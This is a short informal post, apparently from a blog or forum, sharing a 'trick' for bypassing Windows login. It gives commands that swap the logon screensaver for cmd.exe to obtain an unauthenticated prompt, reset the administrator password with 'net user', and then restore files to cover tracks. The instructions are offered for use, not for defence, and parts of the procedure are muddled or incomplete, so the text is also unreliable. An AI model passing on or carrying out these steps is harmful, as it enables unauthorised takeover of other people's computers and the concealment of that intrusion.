This is a cool little trick I’ve got it from my friend and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
rename cmd.exe logon.scr
So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Blade and you want the password 1234 then you would enter “net user Blade 1234? and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.